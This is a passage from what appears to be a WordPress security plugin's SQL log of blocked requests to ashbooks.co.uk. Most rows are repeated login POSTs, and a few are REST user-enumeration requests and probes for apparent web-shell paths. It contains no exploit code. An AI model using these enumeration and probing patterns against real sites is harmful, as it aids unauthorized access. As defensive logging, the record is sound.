Gecko) Chrome\\/48.0.2564.109 Safari\\/537.36\"}','zv5mQHMsNuZTb8pnFtIVUShD',0,1637412245.2643,503,'','POST',403,0,600,0,1,'',0),('210.13.75.122',3524086650,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.106 Safari\\/537.36\"}','ZA4k8YUfi3gHbVc7EBILJMjn',0,1637415472.0708,664,'','POST',403,0,600,0,1,'',0),('95.217.201.199',1608108487,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','2KwBj765GUTJzFntaqMQZeAh',0,1637416453.2846,184,'','POST',403,0,600,0,1,'',0),('176.31.0.242',2954821874,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/58.0.3029.110 Safari\\/537.36\"}','goCsv6An1tIdTDQ39UpXNVk7',0,1637417393.4764,478,'','POST',403,0,600,0,1,'',0),('173.208.152.234',2916129002,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.76.4 (KHTML, like Gecko) Version\\/7.0.4 Safari\\/537.76.4\"}','svtF9EYjDI5MrOgBkVl0pKoa',0,1637417919.0506,457,'','POST',403,0,600,0,1,'',0),('52.44.101.206',875324878,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','rhTOpDGzNH5KfxL8vB9Ec1Vn',0,1637418240.4992,518,'','POST',403,0,600,0,1,'',0),('178.128.215.197',2994788293,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.86 Safari\\/537.36\"}','g96nf15xSEIULFQOuvAHeZwp',0,1637419058.2585,552,'','POST',403,0,600,0,1,'',0),('78.47.116.216',1311732952,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/58.0.3029.110 Safari\\/537.36\"}','BL3Ky6C9f4ERwmPIsu0MrDAZ',0,1637419829.0171,542,'','POST',403,0,600,0,1,'',0),('89.207.146.189',1506775741,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','LOVe5StkaUjB1bQpvsNDY7Zc',0,1637420393.8117,488,'','POST',403,0,600,0,1,'',0),('185.50.199.194',3107112898,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.89 Safari\\/537.36\"}','2eBsjA65Gvf0pE8CtmZhN7ql',0,1637421045.6165,884,'','POST',403,0,600,0,1,'',0),('188.166.1.143',3164995983,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','gA3dSEhVQmIOF0X2HUT5kybC',0,1637421694.6242,494,'','POST',403,0,600,0,1,'',0),('147.182.136.145',2478213265,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','0PGlJe6cpMA3SxXkuIoaQvnN',0,1637422165.7687,155,'','GET',403,0,520,0,1,'',0),('49.249.232.74',838461514,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.106 Safari\\/537.36\"}','MdoXSwfaKUI6LpQT8N2ekmg7',0,1637422455.2096,619,'','POST',403,0,600,0,1,'',0),('118.27.30.151',1981488791,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.193 Safari\\/537.36\"}','GXSVIpgFs9CRtD5zJwi0o8Kj',0,1637423193.3934,834,'','POST',403,0,600,0,1,'',0),('155.133.129.13',2609217805,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','GyCxaAOhlMFuevoIm6JrWKw5',0,1637423831.6453,468,'','POST',403,0,600,0,1,'',0),('107.172.228.84',1806492756,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Trident\\/7.0; rv:11.0) like Gecko\"}','g8dFsjM3vptOlDP0SXR7LYIJ',0,1637424116.2188,439,'','POST',403,0,600,0,1,'',0),('96.125.171.153',1618848665,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1700.107 Safari\\/537.36\"}','QlAP7KhkV0in3RuEUIsrJaFx',0,1637424598.6286,520,'','POST',403,0,600,0,1,'',0),('45.40.166.143',757638799,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1700.107 Safari\\/537.36\"}','Op1DV0RKSrs52bhxtHEwYezF',0,1637425421.4212,456,'','POST',403,0,600,0,1,'',0),('157.245.110.251',2650107643,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','829kfNtiWrTvCXa1peSBUnu5',0,1637426213.0517,630,'','POST',403,0,600,0,1,'',0),('95.217.144.72',1608093768,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','oSQYsE1fTGciFbNP6CZDaJru',0,1637427108.8011,548,'','POST',403,0,600,0,1,'',0),('104.236.126.239',1760329455,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','i5nDmqBV3CW6h9pgQJo8PSlE',0,1637427893.6015,544,'','POST',403,0,600,0,1,'',0),('157.245.250.226',2650143458,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','1Okf7GL5btPIS6zreJAd9sCQ',0,1637429095.9597,524,'','POST',403,0,600,0,1,'',0),('159.223.50.44',2682204716,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','xieomuz3PB598kpIvnr2l0KV',0,1637429645.9119,215,'','GET',403,0,520,0,1,'',0),('162.240.16.237',2733641965,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','seRSTocImEqV0DHzwjun6Q1C',0,1637429942.1681,438,'','POST',403,0,600,0,1,'',0),('80.249.174.66',1358540354,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','tZNOR4qSQ19pTLvuIg3n2cMd',0,1637432307.9444,502,'','POST',403,0,600,0,1,'',0),('155.133.129.13',2609217805,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','lepfI7aPrnm6KDsSgRWobAXd',0,1637433031.8062,510,'','POST',403,0,600,0,1,'',0),('95.216.221.91',1608047963,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','O3IqNH5a2v4FMz8uCicjgGUx',0,1637434513.2420,460,'','POST',403,0,600,0,1,'',0),('62.113.217.22',1047648534,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','fLcvdKrSwOCo3NX1eImlaDk5',0,1637435386.1943,1251,'','POST',403,0,600,0,1,'',0),('109.87.200.193',1834469569,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.109 Safari\\/537.36\"}','9gzaYOtrA4cTobB6uWDX3nNj',0,1637436179.4812,507,'','POST',403,0,600,0,1,'',0),('62.182.159.89',1052155737,'','https://ashbooks.co.uk/css/fw.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\"}','gOwbSTuU701frQCM26evNsJh',0,1637436784.5738,401,'','GET',403,0,700,0,1,'',0),('206.189.111.216',3468521432,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.193 Safari\\/537.36\"}','ehgGKf7BiVPSAx3FTDja942I',0,1637436918.3469,443,'','POST',403,0,600,0,1,'',0),('93.113.111.54',1567715126,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','OLuNvTKHwE27ZzCSjBXWhDkM',0,1637437643.4455,499,'','POST',403,0,600,0,1,'',0),('109.74.197.132',1833616772,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36\"}','86Lc5mDANdarxCy0ujQboRfK',0,1637438266.0941,496,'','POST',403,0,600,0,1,'',0),('187.51.127.28',3140714268,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.122 Safari\\/537.36\"}','u9VZtfBiK4jDgOQ6ecSdYrvP',0,1637439106.2984,445,'','POST',403,0,600,0,1,'',0),('52.44.101.206',875324878,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.122 Safari\\/537.36\"}','9vYIyxZCj7AuQXN8HW2bPd54',0,1637439726.2586,528,'','POST',403,0,600,0,1,'',0),('128.199.190.211',2160574163,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.97 Safari\\/537.36\"}','JpXz3iB05CqjT6rgx89UQcRy',0,1637440345.3391,539,'','POST',403,0,600,0,1,'',0),('194.163.133.151',3265496471,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.116 Safari\\/537.36\"}','yZ3YL6tnEjdv07c1A89mKsrx',0,1637440971.5800,167,'','POST',403,0,600,0,1,'',0),('91.219.236.197',1541139653,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','qGaUSorYO4kC1vhWsjERPyiL',0,1637442410.4057,432,'','POST',403,0,600,0,1,'',0),('87.118.116.103',1467380839,'','https://ashbooks.co.uk/wp-json/wp/v2/users/1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.141 Safari\\/537.36 Edg\\/87.0.664.75\",\"2\":\"https:\\/\\/ashbooks.co.uk\\/\"}','QWn4BguhNvkcYz3CUVF2lfry',0,1637443111.2579,429,'','GET',403,0,520,0,1,'',0),('171.25.193.78',2870591822,'','https://ashbooks.co.uk/wp-json/wp/v2/users/2','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.79 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\\/\"}','lJ6TawbdYyqxA2V1WFCpths0',0,1637443114.6560,788,'','GET',403,0,520,0,1,'',0),('185.220.101.47',3118228783,'','https://ashbooks.co.uk/wp-json/wp/v2/users/3','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\",\"2\":\"https:\\/\\/ashbooks.co.uk\\/\"}','b0OHzvVB28J3XdSyuMQwekGT',0,1637443116.3690,469,'','GET',403,0,520,0,1,'',0),('199.195.253.184',3351510456,'','https://ashbooks.co.uk/wp-json/wp/v2/users/4','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.150 Safari\\/537.36 Edg\\/88.0.705.68\",\"2\":\"https:\\/\\/ashbooks.co.uk\\/\"}','pP1de6FrsNDEtL3fwZBVH79j',0,1637443117.9448,423,'','GET',403,0,520,0,1,'',0),('89.163.252.30',1503919134,'','https://ashbooks.co.uk/wp-json/wp/v2/users/5','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.83 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\\/\"}','UDFkqRoOapCidmP6JWHeYE1j',0,1637443119.2224,394,'','GET',403,0,520,0,1,'',0),('143.198.179.234',2412164074,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','U0xgB2Fen1JbVOXSCHdAYr3L',0,1637443299.9023,733,'','POST',403,0,600,0,1,'',0),('155.133.129.13',2609217805,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','WynUQpDlEhg5ZYXcIwKr6uMS',0,1637443976.0671,2826,'','POST',403,0,600,0,1,'',0),('202.172.26.53',3400276533,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','SU3raBtDQ4XMiyxcGu5TIREo',0,1637444687.3560,534,'','POST',403,0,600,0,1,'',0),('185.126.219.43',3112098603,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','D6zpoaCdWBOEAwGXUMTLJ1e5',0,1637445398.8988,497,'','POST',403,0,600,0,1,'',0),('200.170.156.249',3366624505,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','anfWpmoSvAsHch5xtiD8UBlg',0,1637447178.5613,593,'','POST',403,0,600,0,1,'',0),('5.188.62.140',96222860,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2227.1 Safari\\/537.36\"}','bEDCn4R1eG9WoYwAfKmXc7BN',0,1637447844.3627,510,'','POST',403,0,600,0,1,'',0),('81.88.52.175',1364735151,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','frNCiEaJkYmT6BR2gXFH9yG1',0,1637447961.8205,731,'','POST',403,0,600,0,1,'',0),('65.108.51.66',1097610050,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.193 Safari\\/537.36\"}','EYaz1P23Fi6TBnqOeNCrJL5G',0,1637448606.0142,426,'','POST',403,0,600,0,1,'',0),('198.46.212.102',3324957798,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497 Safari\\/537.36\"}','ie6dqRs3EBmrFb5kvuNcIngf',0,1637448646.9571,421,'','POST',403,0,600,0,1,'',0),('39.105.188.249',661241081,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36\"}','ycb6aXJzTYOl34SVhmDpZNML',0,1637449308.3739,552,'','POST',403,0,600,0,1,'',0),('208.113.160.8',3497107464,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','iRwYz80HkUhnG5Bf7rLDPs1y',0,1637450656.4577,599,'','POST',403,0,600,0,1,'',0),('45.158.15.145',765333393,'','https://ashbooks.co.uk/wp-includes/wp-class.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko\\/20100101 Firefox\\/81.0\"}','ZI0s1i3QLuDR4zUSnerHtMYw',0,1637450873.4486,429,'','GET',403,0,700,0,1,'',0),('94.23.83.103',1578586983,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.116 Safari\\/537.36\"}','rUsugoz17WHqjnLv0EQmMDkt',0,1637451386.8826,775,'','POST',403,0,600,0,1,'',0),('5.188.62.140',96222860,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2228.0 Safari\\/537.36\"}','HvgdIfC1TimKPDB0lSr9n8Jz',0,1637452817.5549,731,'','POST',403,0,600,0,1,'',0),('185.2.5.25',3103917337,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.116 Safari\\/537.36\"}','yQL5EWcgDdzAtp628vlojsVr',0,1637453447.5159,484,'','POST',403,0,600,0,1,'',0),('143.244.184.195',2415179971,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','xvau6hGA9EZQ17Kj4gNJ5yYR',0,1637454097.8955,499,'','POST',403,0,600,0,1,'',0),('67.205.61.254',1137524222,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','WD4ZCzGeTuaihqtEAQYm6BFk',0,1637454747.0286,516,'','POST',403,0,600,0,1,'',0),('34.105.209.130',577360258,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','dawV8UneTAX9v3CJgGB54spE',0,1637455427.3412,473,'','POST',403,0,600,0,1,'',0),('79.143.181.62',1334818110,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/58.0.3029.110 Safari\\/537.36\"}','3HdrKa9oTe8BzVFLfXStk5xi',0,1637456100.1527,500,'','POST',403,0,600,0,1,'',0),('162.144.126.104',2727378536,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','Ulrsucj7JBE8DHodmWqXgx5w',0,1637457013.6424,460,'','POST',403,0,600,0,1,'',0),('5.188.62.140',96222860,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2228.0 Safari\\/537.36\"}','lci0yaxuqvXM61zw2bfnNk8D',0,1637457827.8449,1238,'','POST',403,0,600,0,1,'',0),('111.231.4.211',1877411027,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','dPOYy72b3xlSX5VEKBiIu4QF',0,1637458516.6934,490,'','POST',403,0,600,0,1,'',0),('109.87.200.193',1834469569,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','xtLc9DHmkPWbFlKVj6GwadIu',0,1637459296.2722,588,'','POST',403,0,600,0,1,'',0),('206.189.23.28',3468498716,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','ZzpWCq10Gdn893JoYgv4KT6P',0,1637460073.9789,627,'','POST',403,0,600,0,1,'',0),('95.111.254.6',1601175046,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.122 Safari\\/537.36\"}','dwY9FmagnyMqiZNvb7AoQBLV',0,1637460787.4969,533,'','POST',403,0,600,0,1,'',0),('143.198.162.183',2412159671,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.89 Safari\\/537.36\"}','OhQYHXMpbwr4gFtNRTIEAnsc',0,1637462221.8755,640,'','POST',403,0,600,0,1,'',0),('5.188.62.140',96222860,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2227.1 Safari\\/537.36\"}','O1PL9GZhuvdWnlB8FJ20e4TH',0,1637462858.8838,257,'','POST',403,0,600,0,1,'',0),('74.214.24.238',1255545070,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','dlZR3Tv4rIV6mzsqKkJHAWcF',0,1637463749.8951,163611,'','POST',403,0,600,0,1,'',0),('93.113.111.54',1567715126,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','dU3RGq8k7Hz9lZixf6b1mWJD',0,1637464608.9435,542,'','POST',403,0,600,0,1,'',0),('69.163.163.120',1168352120,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','3nvLqlUZt1M7BzWse2Q8guNP',0,1637465278.1370,513,'','POST',403,0,600,0,1,'',0),('52.44.101.206',875324878,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','4wdpqkB5JsvcEVCX2RfjKGZM',0,1637465952.7294,563,'','POST',403,0,600,0,1,'',0),('75.119.143.160',1266126752,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.89 Safari\\/537.36\"}','30u6hiSI4JdLewCBtaHlNO59',0,1637466629.0574,554,'','POST',403,0,600,0,1,'',0),('34.69.109.132',574975364,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','c5g9Fn0L3tTQmPSjvz8yMIO4',0,1637467333.2743,749,'','POST',403,0,600,0,1,'',0),('52.44.101.206',875324878,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/51.0.2704.106 Safari\\/537.36\"}','IzeYp8HvXusFDMUPA2oEQnVr',0,1637468909.9386,509,'','POST',403,0,600,0,1,'',0),('91.221.37.58',1541219642,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','for38bVtuUBL2DFxZR5aTHiq',0,1637469711.9508,462,'','POST',403,0,600,0,1,'',0),('118.27.30.151',1981488791,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1700.107 Safari\\/537.36\"}','ou5IwNzQtyfY2WcS84XrV3A7',0,1637470318.7871,1143,'','POST',403,0,600,0,1,'',0),('46.101.150.34',778409506,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','CI3xNwgq0AbchnLEFHVjUtp8',0,1637470866.1599,480,'','POST',403,0,600,0,1,'',0),('187.49.234.46',3140610606,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','bnqjsi0PJhS8LHQEd34Wkt2c',0,1637472179.4867,479,'','POST',403,0,600,0,1,'',0),('107.172.230.112',1806493296,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729 